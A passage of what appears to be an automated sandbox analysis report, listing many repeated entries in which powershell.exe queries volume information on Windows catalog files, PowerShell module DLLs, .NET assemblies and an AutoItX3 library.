        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0210~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
